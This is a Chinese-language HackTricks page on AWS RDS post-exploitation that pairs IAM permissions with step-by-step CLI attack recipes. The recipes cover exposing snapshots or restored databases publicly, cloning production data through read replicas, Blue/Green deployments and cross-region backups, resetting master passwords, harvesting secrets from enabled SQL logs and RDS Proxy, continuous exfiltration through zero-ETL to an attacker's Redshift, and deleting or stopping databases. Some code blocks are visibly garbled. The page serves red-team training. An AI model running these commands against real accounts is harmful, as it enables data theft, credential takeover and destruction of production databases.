AWS - RDS 后渗透

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

RDS

For more information check:

AWS - Relational Database (RDS) Enum

rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot, rds:ModifyDBInstance

如果攻击者拥有足够的权限,他可以通过为该 DB 创建一个快照,然后从该快照恢复出一个公开可访问的 DB

aws rds describe-db-instances # Get DB identifier

aws rds create-db-snapshot \
--db-instance-identifier <db-id> \
--db-snapshot-identifier cloudgoat

# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups

aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier "new-db-not-malicious" \
--db-snapshot-identifier <scapshotId> \
--db-subnet-group-name <db subnet group> \
--publicly-accessible \
--vpc-security-group-ids <ec2-security group>

aws rds modify-db-instance \
--db-instance-identifier "new-db-not-malicious" \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# Connect to the new DB after a few mins

rds:StopDBCluster & rds:StopDBInstance

具有 rds:StopDBClusterrds:StopDBInstance 权限的攻击者可以强制立即停止一个 RDS 实例或整个集群,导致数据库不可用、连接中断以及依赖数据库的进程被中断。

要停止单个 DB 实例(示例):

aws rds stop-db-instance \
--db-instance-identifier <DB_INSTANCE_IDENTIFIER>

停止整个 DB 集群 (示例):

aws rds stop-db-cluster \
--db-cluster-identifier <DB_CLUSTER_IDENTIFIER>

rds:Modify*

被授予 rds:Modify* 权限的攻击者可以在不直接接触实例或集群的情况下,修改关键配置和辅助资源 (parameter groups, option groups, proxy endpoints and endpoint-groups, target groups, subnet groups, capacity settings, snapshot/cluster attributes, certificates, integrations, etc.)。诸如调整 connection/time-out parameters、更改一个 proxy endpoint、修改哪些 certificates 被信任、改变 logical capacity 或重新配置一个 subnet group 等更改,可能削弱安全性(打开新的访问路径)、破坏路由和负载均衡、使复制/备份策略失效,并通常降低可用性或可恢复性。这些修改也可能促成间接 data exfiltration,或妨碍在事件发生后对数据库的有序恢复。

移动或更改分配给 RDS subnet group 的 subnets:

aws rds modify-db-subnet-group \
--db-subnet-group-name <db-subnet-group-name> \
--subnet-ids <subnet-id-1> <subnet-id-2>

在 cluster parameter group 中更改低级引擎参数:

aws rds modify-db-cluster-parameter-group \
--db-cluster-parameter-group-name <parameter-group-name> \
--parameters "ParameterName=<parameter-name>,ParameterValue=<value>,ApplyMethod=immediate"

rds:Restore*

具有 rds:Restore* 权限的攻击者可以从快照、自动备份、point-in-time recovery (PITR) 或存储在 S3 的文件恢复整个数据库,创建新的实例或集群并用所选时间点的数据填充这些实例或集群。这些操作不会覆盖原始资源 — 它们会创建包含历史数据的新对象 — 这使得攻击者能够获取数据库的完整、可用副本(来自过去的时间点或外部 S3 文件),并用它们来 exfiltrate data、篡改历史记录或重建先前的状态。

将 DB 实例恢复到特定时间点:

aws rds restore-db-instance-to-point-in-time \
--source-db-instance-identifier <source-db-instance-identifier> \
--target-db-instance-identifier <target-db-instance-identifier> \
--restore-time "<restore-time-ISO8601>" \
--db-instance-class <db-instance-class> \
--publicly-accessible --no-multi-az

rds:Delete*

被授予 rds:Delete* 的攻击者可以删除 RDS 资源:删除 DB 实例、集群、快照、自动备份、子网组、参数/选项组及相关工件,从而导致即时服务中断、数据丢失、恢复点被破坏以及取证证据丧失。

# Delete a DB instance (creates a final snapshot unless you skip it)
aws rds delete-db-instance \
--db-instance-identifier <DB_INSTANCE_ID> \
--final-db-snapshot-identifier <FINAL_SNAPSHOT_ID>     # omit or replace with --skip-final-snapshot to avoid snapshot

# Delete a DB instance and skip final snapshot (more destructive)
aws rds delete-db-instance \
--db-instance-identifier <DB_INSTANCE_ID> \
--skip-final-snapshot

# Delete a manual DB snapshot
aws rds delete-db-snapshot \
--db-snapshot-identifier <DB_SNAPSHOT_ID>

# Delete an Aurora DB cluster (creates a final snapshot unless you skip)
aws rds delete-db-cluster \
--db-cluster-identifier <DB_CLUSTER_ID> \
--final-db-snapshot-identifier <FINAL_CLUSTER_SNAPSHOT_ID>   # or use --skip-final-snapshot

rds:ModifyDBSnapshotAttribute, rds:CreateDBSnapshot

具有这些权限的攻击者可以创建 DB 的快照并使其公开****可用。然后,他可以在自己的账户中从该快照创建一个 DB。

如果攻击者没有 rds:CreateDBSnapshot,他仍然可以将其他已创建的快照设为公开

# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>

# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}

rds:DownloadDBLogFilePortion

拥有 rds:DownloadDBLogFilePortion 权限的攻击者可以 下载 RDS 实例日志文件的部分内容。如果敏感数据或访问凭证被意外记录,攻击者可能利用这些信息提升权限或执行未授权的操作。

aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text

潜在影响: 通过 leaked credentials 访问敏感信息或执行未经授权的操作。

rds:DeleteDBInstance

具有这些权限的攻击者可以 DoS 现有的 RDS 实例

# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot

潜在影响: 删除现有 RDS 实例,以及可能的数据丢失。

rds:StartExportTask

Note

TODO: 测试

拥有此权限的攻击者可以 将 RDS 实例快照导出到 S3 存储桶。如果攻击者控制了目标 S3 存储桶,他们可能能够访问导出快照中的敏感数据。

aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id

Potential impact:访问导出快照中的敏感数据。

跨区域自动备份复制以进行隐蔽还原 (rds:StartDBInstanceAutomatedBackupsReplication)

滥用跨区域自动备份复制,将 RDS 实例的自动备份静默复制到另一个 AWS 区域并在那恢复。攻击者随后可以将恢复的 DB 设为公开可访问并重置主密码,从而在防守方可能未监控的区域以外通道访问数据。

所需权限(最低):

  • rds:StartDBInstanceAutomatedBackupsReplication 在目标区域
  • rds:DescribeDBInstanceAutomatedBackups 在目标区域
  • rds:RestoreDBInstanceToPointInTime 在目标区域
  • rds:ModifyDBInstance 在目标区域
  • rds:StopDBInstanceAutomatedBackupsReplication(可选清理)
  • ec2:CreateSecurityGroupec2:AuthorizeSecurityGroupIngress(用于暴露恢复的 DB)

影响:通过将生产数据的副本恢复到另一个区域并使用攻击者控制的凭据将其公开暴露,实现持久性和数据外泄。

端到端 CLI(替换占位符) ```bash # 1) Recon (SOURCE region A) aws rds describe-db-instances \ --region \ --query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,DBInstanceStatus,PreferredBackupWindow]' \ --output table

2) Start cross-Region automated backups replication (run in DEST region B)

aws rds start-db-instance-automated-backups-replication
–region <DEST_REGION>
–source-db-instance-arn <SOURCE_DB_INSTANCE_ARN>
–source-region <SOURCE_REGION>
–backup-retention-period 7

3) Wait for replication to be ready in DEST

aws rds describe-db-instance-automated-backups
–region <DEST_REGION>
–query ‘DBInstanceAutomatedBackups[*].[DBInstanceAutomatedBackupsArn,DBInstanceIdentifier,Status]’
–output table

Proceed when Status is “replicating” or “active” and note the DBInstanceAutomatedBackupsArn

4) Restore to latest restorable time in DEST

aws rds restore-db-instance-to-point-in-time
–region <DEST_REGION>
–source-db-instance-automated-backups-arn <AUTO_BACKUP_ARN>
–target-db-instance-identifier <TARGET_DB_ID>
–use-latest-restorable-time
–db-instance-class db.t3.micro aws rds wait db-instance-available –region <DEST_REGION> –db-instance-identifier <TARGET_DB_ID>

5) Make public and reset credentials in DEST

5a) Create/choose an open SG permitting TCP/3306 (adjust engine/port as needed)

OPEN_SG_ID=$(aws ec2 create-security-group –region <DEST_REGION>
–group-name open-rds- –description open –vpc-id <DEST_VPC_ID>
–query GroupId –output text) aws ec2 authorize-security-group-ingress –region <DEST_REGION>
–group-id “$OPEN_SG_ID”
–ip-permissions IpProtocol=tcp,FromPort=3306,ToPort=3306,IpRanges=‘[{CidrIp=0.0.0.0/0}]’

5b) Publicly expose restored DB and attach the SG

aws rds modify-db-instance –region <DEST_REGION>
–db-instance-identifier <TARGET_DB_ID>
–publicly-accessible
–vpc-security-group-ids “$OPEN_SG_ID”
–apply-immediately aws rds wait db-instance-available –region <DEST_REGION> –db-instance-identifier <TARGET_DB_ID>

5c) Reset the master password

aws rds modify-db-instance –region <DEST_REGION>
–db-instance-identifier <TARGET_DB_ID>
–master-user-password ‘<NEW_STRONG_PASSWORD>’
–apply-immediately aws rds wait db-instance-available –region <DEST_REGION> –db-instance-identifier <TARGET_DB_ID>

6) Connect to <TARGET_DB_ID> endpoint and validate data (example for MySQL)

ENDPOINT=$(aws rds describe-db-instances –region <DEST_REGION>
–db-instance-identifier <TARGET_DB_ID>
–query ‘DBInstances[0].Endpoint.Address’ –output text) mysql -h “$ENDPOINT” -u <MASTER_USERNAME> -p’<NEW_STRONG_PASSWORD>’ -e ‘SHOW DATABASES;’

7) Optional: stop replication

aws rds stop-db-instance-automated-backups-replication
–region <DEST_REGION>
–source-db-instance-arn <SOURCE_DB_INSTANCE_ARN>

</details>


### 通过 DB 参数组 启用完整 SQL 日志并通过 RDS 日志 API 外泄

滥用 `rds:ModifyDBParameterGroup` 并结合 RDS 日志下载 API 捕获应用执行的所有 SQL 语句(不需要 DB 引擎凭据)。启用引擎的 SQL 日志,并通过 `rds:DescribeDBLogFiles` 和 `rds:DownloadDBLogFilePortion`(或 REST 的 `downloadCompleteLogFile`)拉取日志文件。可用于收集可能包含 secrets/PII/JWTs 的查询。

Permissions needed (minimum):
- `rds:DescribeDBInstances`, `rds:DescribeDBLogFiles`, `rds:DownloadDBLogFilePortion`
- `rds:CreateDBParameterGroup`, `rds:ModifyDBParameterGroup`
- `rds:ModifyDBInstance` (only to attach a custom parameter group if the instance is using the default one)
- `rds:RebootDBInstance` (for parameters requiring reboot, e.g., PostgreSQL)

Steps
1) Recon 目标和当前参数组
```bash
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBParameterGroups[0].DBParameterGroupName]' \
--output table
  1. 确保已附加自定义 DB parameter group(无法编辑默认的)
  • 如果该 instance 已经使用 custom group,请在下一步重用其名称。
  • 否则创建并附加一个与 engine family 匹配的:
# Example for PostgreSQL 16
aws rds create-db-parameter-group \
--db-parameter-group-name ht-logs-pg \
--db-parameter-group-family postgres16 \
--description "HT logging"

aws rds modify-db-instance \
--db-instance-identifier <DB> \
--db-parameter-group-name ht-logs-pg \
--apply-immediately
# Wait until status becomes "available"
  1. 启用详细的 SQL 日志记录
  • MySQL 引擎(即时 / 无需重启):
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=general_log,ParameterValue=1,ApplyMethod=immediate" \
"ParameterName=log_output,ParameterValue=FILE,ApplyMethod=immediate"
# Optional extras:
#   "ParameterName=slow_query_log,ParameterValue=1,ApplyMethod=immediate" \
#   "ParameterName=long_query_time,ParameterValue=0,ApplyMethod=immediate"
  • PostgreSQL 引擎 (需要重启):
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=log_statement,ParameterValue=all,ApplyMethod=pending-reboot"
# Optional to log duration for every statement:
#   "ParameterName=log_min_duration_statement,ParameterValue=0,ApplyMethod=pending-reboot"

# Reboot if any parameter is pending-reboot
aws rds reboot-db-instance --db-instance-identifier <DB>
  1. 让工作负载运行(或生成查询)。语句将被写入引擎文件日志
  • MySQL: general/mysql-general.log
  • PostgreSQL: postgresql.log
  1. 发现并下载日志(无需 DB creds)
aws rds describe-db-log-files --db-instance-identifier <DB>

# Pull full file via portions (iterate until AdditionalDataPending=false). For small logs a single call is enough:
aws rds download-db-log-file-portion \
--db-instance-identifier <DB> \
--log-file-name general/mysql-general.log \
--starting-token 0 \
--output text > dump.log
  1. 离线分析以查找敏感数据
grep -Ei "password=|aws_access_key_id|secret|authorization:|bearer" dump.log | sed 's/\(aws_access_key_id=\)[A-Z0-9]*/\1AKIA.../; s/\(secret=\).*/\1REDACTED/; s/\(Bearer \).*/\1REDACTED/' | head

示例证据(已编辑):

2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('user=alice password=Sup3rS3cret!')
2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('authorization: Bearer REDACTED')
2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('aws_access_key_id=AKIA... secret=REDACTED')

清理

  • 将参数恢复为默认值,并在必要时重启:
# MySQL
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=general_log,ParameterValue=0,ApplyMethod=immediate"

# PostgreSQL
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=log_statement,ParameterValue=none,ApplyMethod=pending-reboot"
# Reboot if pending-reboot

影响:Post-exploitation 数据访问,通过 AWS APIs 捕获所有应用的 SQL 语句(无需 DB creds),可能导致 leaking secrets、JWTs 和 PII。

rds:CreateDBInstanceReadReplica, rds:ModifyDBInstance

滥用 RDS 只读副本可以在不接触主实例凭据的情况下获得 out-of-band 的读取访问权限。攻击者可以从生产实例创建一个只读副本,重置该副本的主密码(这不会更改主实例),并可选择将副本公开暴露以 exfiltrate 数据。

所需权限(最低):

  • rds:DescribeDBInstances
  • rds:CreateDBInstanceReadReplica
  • rds:ModifyDBInstance
  • ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress(如果公开暴露)

影响:通过具有攻击者控制凭据的副本获得对生产数据的只读访问;检测可能性较低,因为主实例保持不变且复制继续进行。

# 1) Recon: find non-Aurora sources with backups enabled
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBInstanceArn,DBSubnetGroup.DBSubnetGroupName,VpcSecurityGroups[0].VpcSecurityGroupId,PubliclyAccessible]' \
--output table

# 2) Create a permissive SG (replace <VPC_ID> and <YOUR_IP/32>)
aws ec2 create-security-group --group-name rds-repl-exfil --description 'RDS replica exfil' --vpc-id <VPC_ID> --query GroupId --output text
aws ec2 authorize-security-group-ingress --group-id <SGID> --ip-permissions '[{"IpProtocol":"tcp","FromPort":3306,"ToPort":3306,"IpRanges":[{"CidrIp":"<YOUR_IP/32>","Description":"tester"}]}]'

# 3) Create the read replica (optionally public)
aws rds create-db-instance-read-replica \
--db-instance-identifier <REPL_ID> \
--source-db-instance-identifier <SOURCE_DB> \
--db-instance-class db.t3.medium \
--publicly-accessible \
--vpc-security-group-ids <SGID>
aws rds wait db-instance-available --db-instance-identifier <REPL_ID>

# 4) Reset ONLY the replica master password (primary unchanged)
aws rds modify-db-instance --db-instance-identifier <REPL_ID> --master-user-password 'NewStr0ng!Passw0rd' --apply-immediately
aws rds wait db-instance-available --db-instance-identifier <REPL_ID>

# 5) Connect and dump (use the SOURCE master username + NEW password)
REPL_ENDPOINT=$(aws rds describe-db-instances --db-instance-identifier <REPL_ID> --query 'DBInstances[0].Endpoint.Address' --output text)
# e.g., with mysql client:  mysql -h "$REPL_ENDPOINT" -u <MASTER_USERNAME> -p'NewStr0ng!Passw0rd' -e 'SHOW DATABASES; SELECT @@read_only, CURRENT_USER();'

# Optional: promote for persistence
# aws rds promote-read-replica --db-instance-identifier <REPL_ID>

示例证据 (MySQL):

  • 副本 DB 状态: available, 只读复制: replicating
  • 使用新密码成功连接,并通过 @@read_only=1 确认对只读副本的访问。

rds:CreateBlueGreenDeployment, rds:ModifyDBInstance

滥用 RDS Blue/Green 将生产 DB 克隆到一个持续复制的只读 green 环境。然后重置 green 主凭据,以在不接触 blue (prod) 实例的情况下访问数据。这比 snapshot sharing 更隐蔽,且常常能绕过仅关注源端的监控。

# 1) Recon – find eligible source (non‑Aurora MySQL/PostgreSQL in the same account)
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,EngineVersion,DBSubnetGroup.DBSubnetGroupName,PubliclyAccessible]'

# Ensure: automated backups enabled on source (BackupRetentionPeriod > 0), no RDS Proxy, supported engine/version

# 2) Create Blue/Green deployment (replicates blue->green continuously)
aws rds create-blue-green-deployment \
--blue-green-deployment-name ht-bgd-attack \
--source <BLUE_DB_ARN> \
# Optional to upgrade: --target-engine-version <same-or-higher-compatible>

# Wait until deployment Status becomes AVAILABLE, then note the green DB id
aws rds describe-blue-green-deployments \
--blue-green-deployment-identifier <BGD_ID> \
--query 'BlueGreenDeployments[0].SwitchoverDetails[0].TargetMember'

# Typical green id: <blue>-green-XXXX

# 3) Reset the green master password (does not affect blue)
aws rds modify-db-instance \
--db-instance-identifier <GREEN_DB_ID> \
--master-user-password 'Gr33n!Exfil#1' \
--apply-immediately

# Optional: expose the green for direct access (attach an SG that allows the DB port)
aws rds modify-db-instance \
--db-instance-identifier <GREEN_DB_ID> \
--publicly-accessible \
--vpc-security-group-ids <SG_ALLOWING_DB_PORT> \
--apply-immediately

# 4) Connect to the green endpoint and query/exfiltrate (green is read‑only)
aws rds describe-db-instances \
--db-instance-identifier <GREEN_DB_ID> \
--query 'DBInstances[0].Endpoint.Address' --output text

# Then connect with the master username and the new password and run SELECT/dumps
# e.g. MySQL: mysql -h <endpoint> -u <master_user> -p'Gr33n!Exfil#1'

# 5) Cleanup – remove blue/green and the green resources
aws rds delete-blue-green-deployment \
--blue-green-deployment-identifier <BGD_ID> \
--delete-target true

影响:只读,但可以完全访问生产环境的近实时克隆,而不会修改生产实例。适合用于隐蔽的数据提取和离线分析。

Out-of-band SQL via RDS Data API by enabling HTTP endpoint + resetting master password

滥用 Aurora 在目标集群上启用 RDS Data API 的 HTTP endpoint,重置 master password 为你可控的值,并通过 HTTPS 执行 SQL(不需要 VPC 网络路径)。适用于支持 Data API/EnableHttpEndpoint 的 Aurora 引擎(例如,Aurora MySQL 8.0 provisioned;某些 Aurora PostgreSQL/MySQL 版本)。

最低权限:

  • rds:DescribeDBClusters, rds:ModifyDBCluster (或 rds:EnableHttpEndpoint)
  • secretsmanager:CreateSecret
  • rds-data:ExecuteStatement (如果使用则包括 rds-data:BatchExecuteStatement)

影响:绕过网络分段,通过 AWS APIs 外传数据,而无需与 DB 建立直接的 VPC 连接。

端到端 CLI (Aurora MySQL 示例) ```bash # 1) Identify target cluster ARN REGION=us-east-1 CLUSTER_ID= CLUSTER_ARN=$(aws rds describe-db-clusters --region $REGION \ --db-cluster-identifier $CLUSTER_ID \ --query 'DBClusters[0].DBClusterArn' --output text)

2) Enable Data API HTTP endpoint on the cluster

Either of the following (depending on API/engine support):

aws rds enable-http-endpoint –region $REGION –resource-arn “$CLUSTER_ARN”

or

aws rds modify-db-cluster –region $REGION –db-cluster-identifier $CLUSTER_ID
–enable-http-endpoint –apply-immediately

Wait until HttpEndpointEnabled is True

aws rds wait db-cluster-available –region $REGION –db-cluster-identifier $CLUSTER_ID aws rds describe-db-clusters –region $REGION –db-cluster-identifier $CLUSTER_ID
–query ‘DBClusters[0].HttpEndpointEnabled’ –output text

3) Reset master password to attacker-controlled value

aws rds modify-db-cluster –region $REGION –db-cluster-identifier $CLUSTER_ID
–master-user-password ‘Sup3rStr0ng!1’ –apply-immediately

Wait until pending password change is applied

while :; do aws rds wait db-cluster-available –region $REGION –db-cluster-identifier $CLUSTER_ID P=$(aws rds describe-db-clusters –region $REGION –db-cluster-identifier $CLUSTER_ID
–query ‘DBClusters[0].PendingModifiedValues.MasterUserPassword’ –output text) [[ “$P” == “None” || “$P” == “null” ]] && break sleep 10 done

4) Create a Secrets Manager secret for Data API auth

SECRET_ARN=$(aws secretsmanager create-secret –region $REGION –name rdsdata/demo-$CLUSTER_ID
–secret-string ‘{“username”:“admin”,“password”:“Sup3rStr0ng!1”}’
–query ARN –output text)

5) Prove out-of-band SQL via HTTPS using rds-data

(Example with Aurora MySQL; for PostgreSQL, adjust SQL and username accordingly)

aws rds-data execute-statement –region $REGION –resource-arn “$CLUSTER_ARN”
–secret-arn “$SECRET_ARN” –database mysql –sql “create database if not exists demo;” aws rds-data execute-statement –region $REGION –resource-arn “$CLUSTER_ARN”
–secret-arn “$SECRET_ARN” –database demo –sql “create table if not exists pii(note text);” aws rds-data execute-statement –region $REGION –resource-arn “$CLUSTER_ARN”
–secret-arn “$SECRET_ARN” –database demo –sql “insert into pii(note) values (‘token=SECRET_JWT’);” aws rds-data execute-statement –region $REGION –resource-arn “$CLUSTER_ARN”
–secret-arn “$SECRET_ARN” –database demo –sql “select current_user(), now(), (select count(*) from pii) as row_count;”
–format-records-as JSON

</details>

注意事项:
- 如果 rds-data 拒绝多语句 SQL,请分别发出 execute-statement 调用。
- 对于 modify-db-cluster --enable-http-endpoint 无效的引擎,请使用 rds enable-http-endpoint --resource-arn。
- 确保该引擎/版本实际支持 Data API;否则 HttpEndpointEnabled 将保持 False。


### 通过 RDS Proxy 的 auth secrets 获取 DB 凭证 (`rds:DescribeDBProxies` + `secretsmanager:GetSecretValue`)

滥用 RDS Proxy 配置以发现用于后端认证的 Secrets Manager secret,然后读取该 secret 以获取数据库凭据。许多环境授予了广泛的 `secretsmanager:GetSecretValue` 权限,使其成为一个低摩擦的转向 DB 凭证的方法。如果该 secret 使用 CMK,权限范围错误的 KMS 也可能允许 `kms:Decrypt`。

所需权限(最低):
- `rds:DescribeDBProxies`
- `secretsmanager:GetSecretValue` on the referenced SecretArn
- Optional when the secret uses a CMK: `kms:Decrypt` on that key

影响:立即披露配置在代理上的 DB 用户名/密码;可直接访问数据库或进行进一步横向移动。

步骤
```bash
# 1) Enumerate proxies and extract the SecretArn used for auth
aws rds describe-db-proxies \
--query DBProxies[*].[DBProxyName,Auth[0].AuthScheme,Auth[0].SecretArn] \
--output table

# 2) Read the secret value (common over-permission)
aws secretsmanager get-secret-value \
--secret-id <SecretArnFromProxy> \
--query SecretString --output text
# Example output: {"username":"admin","password":"S3cr3t!"}

实验 (最小可重现)

REGION=us-east-1
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SECRET_ARN=$(aws secretsmanager create-secret \
--region $REGION --name rds/proxy/aurora-demo \
--secret-string username:admin \
--query ARN --output text)
aws iam create-role --role-name rds-proxy-secret-role \
--assume-role-policy-document Version:2012-10-17
aws iam attach-role-policy --role-name rds-proxy-secret-role \
--policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws rds create-db-proxy --db-proxy-name p0 --engine-family MYSQL \
--auth [AuthScheme:SECRETS] \
--role-arn arn:aws:iam::$ACCOUNT_ID:role/rds-proxy-secret-role \
--vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true --query Subnets[].SubnetId --output text)
aws rds wait db-proxy-available --db-proxy-name p0
# Now run the enumeration + secret read from the Steps above

清理 (实验室)

aws rds delete-db-proxy --db-proxy-name p0
aws iam detach-role-policy --role-name rds-proxy-secret-role --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws iam delete-role --role-name rds-proxy-secret-role
aws secretsmanager delete-secret --secret-id rds/proxy/aurora-demo --force-delete-without-recovery

Stealthy continuous exfiltration via Aurora zero‑ETL to Amazon Redshift (rds:CreateIntegration)

滥用 Aurora PostgreSQL zero‑ETL 集成,将生产数据持续复制到你控制的 Redshift Serverless 命名空间中。若存在一个允许对特定 Aurora cluster ARN 授权 CreateInboundIntegration/AuthorizeInboundIntegration 的宽松 Redshift 资源策略,attacker 可以在无需 DB creds、snapshots 或网络暴露的情况下建立近实时的数据副本。

Permissions needed (minimum):

  • rds:CreateIntegration, rds:DescribeIntegrations, rds:DeleteIntegration
  • redshift:PutResourcePolicy, redshift:DescribeInboundIntegrations, redshift:DescribeIntegrations
  • redshift-data:ExecuteStatement/GetStatementResult/ListDatabases (to query)
  • rds-data:ExecuteStatement (optional; to seed data if needed)

Tested on: us-east-1, Aurora PostgreSQL 16.4 (Serverless v2), Redshift Serverless.

1) 创建 Redshift Serverless 命名空间 + 工作组 ```bash REGION=us-east-1 RS_NS_ARN=$(aws redshift-serverless create-namespace --region $REGION --namespace-name ztl-ns \ --admin-username adminuser --admin-user-password 'AdminPwd-1!' \ --query namespace.namespaceArn --output text) RS_WG_ARN=$(aws redshift-serverless create-workgroup --region $REGION --workgroup-name ztl-wg \ --namespace-name ztl-ns --base-capacity 8 --publicly-accessible \ --query workgroup.workgroupArn --output text) # Wait until AVAILABLE, then enable case sensitivity (required for PostgreSQL) aws redshift-serverless update-workgroup --region $REGION --workgroup-name ztl-wg \ --config-parameters parameterKey=enable_case_sensitive_identifier,parameterValue=true ```
2) 配置 Redshift 资源策略以允许 Aurora 源 ```bash ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text) SRC_ARN= cat > rs-rp.json <
3) 创建 Aurora PostgreSQL 集群(启用 Data API 和 逻辑复制) ```bash CLUSTER_ID=aurora-ztl aws rds create-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \ --engine aurora-postgresql --engine-version 16.4 \ --master-username postgres --master-user-password 'InitPwd-1!' \ --enable-http-endpoint --no-deletion-protection --backup-retention-period 1 aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID # Serverless v2 instance aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \ --serverless-v2-scaling-configuration MinCapacity=0.5,MaxCapacity=1 --apply-immediately aws rds create-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 \ --db-instance-class db.serverless --engine aurora-postgresql --db-cluster-identifier $CLUSTER_ID aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 # Cluster parameter group for zero‑ETL aws rds create-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg \ --db-parameter-group-family aurora-postgresql16 --description "APG16 zero-ETL params" aws rds modify-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg --parameters \ ParameterName=rds.logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \ ParameterName=aurora.enhanced_logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \ ParameterName=aurora.logical_replication_backup,ParameterValue=0,ApplyMethod=pending-reboot \ ParameterName=aurora.logical_replication_globaldb,ParameterValue=0,ApplyMethod=pending-reboot aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \ --db-cluster-parameter-group-name apg16-ztl-zerodg --apply-immediately aws rds reboot-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 SRC_ARN=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID --query 'DBClusters[0].DBClusterArn' --output text) ```
4) 从 RDS 创建 zero‑ETL 集成 ```bash # Include all tables in the default 'postgres' database aws rds create-integration --region $REGION --source-arn "$SRC_ARN" \ --target-arn "$RS_NS_ARN" --integration-name ztl-demo \ --data-filter 'include: postgres.*.*' # Redshift inbound integration should become ACTIVE aws redshift describe-inbound-integrations --region $REGION --target-arn "$RS_NS_ARN" ```
5) 在 Redshift 中实体化并查询复制的数据 ```bash # Create a Redshift database from the inbound integration (use integration_id from SVV_INTEGRATION) aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \ --sql "select integration_id from svv_integration" # take the GUID value aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \ --sql "create database ztl_db from integration '' database postgres" # List tables replicated aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database ztl_db \ --sql "select table_schema,table_name from information_schema.tables where table_schema not in ('pg_catalog','information_schema') order by 1,2 limit 20;" ```

证据(测试中观察到):

  • redshift describe-inbound-integrations: Status ACTIVE for Integration arn:…377a462b-…
  • SVV_INTEGRATION 显示 integration_id 377a462b-c42c-4f08-937b-77fe75d98211,且在数据库创建之前状态为 PendingDbConnectState。
  • 在执行 CREATE DATABASE FROM INTEGRATION 之后,列出表显示 schema ztl 和 table customers;从 ztl.customers 查询返回 2 行 (Alice, Bob)。

影响:攻击者可持续近实时地对选定的 Aurora PostgreSQL 表进行 exfiltration 到其控制的 Redshift Serverless,且无需使用数据库凭证、备份或对源集群的网络访问。

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks